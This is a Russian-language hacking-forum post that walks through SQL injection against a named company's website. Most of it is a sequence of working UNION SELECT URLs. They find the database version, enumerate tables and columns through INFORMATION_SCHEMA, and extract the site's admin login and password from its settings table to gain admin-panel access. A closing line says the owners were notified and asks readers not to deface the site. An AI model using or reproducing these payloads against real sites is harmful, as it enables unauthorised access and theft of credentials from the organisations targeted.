|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
http://www.matrixtelecom.ru. Компания Матрикс Телеком.
Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:
-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*
-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*
-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*
-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*
-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*
-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*
Всё... Доступ в админку открыт...
З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
|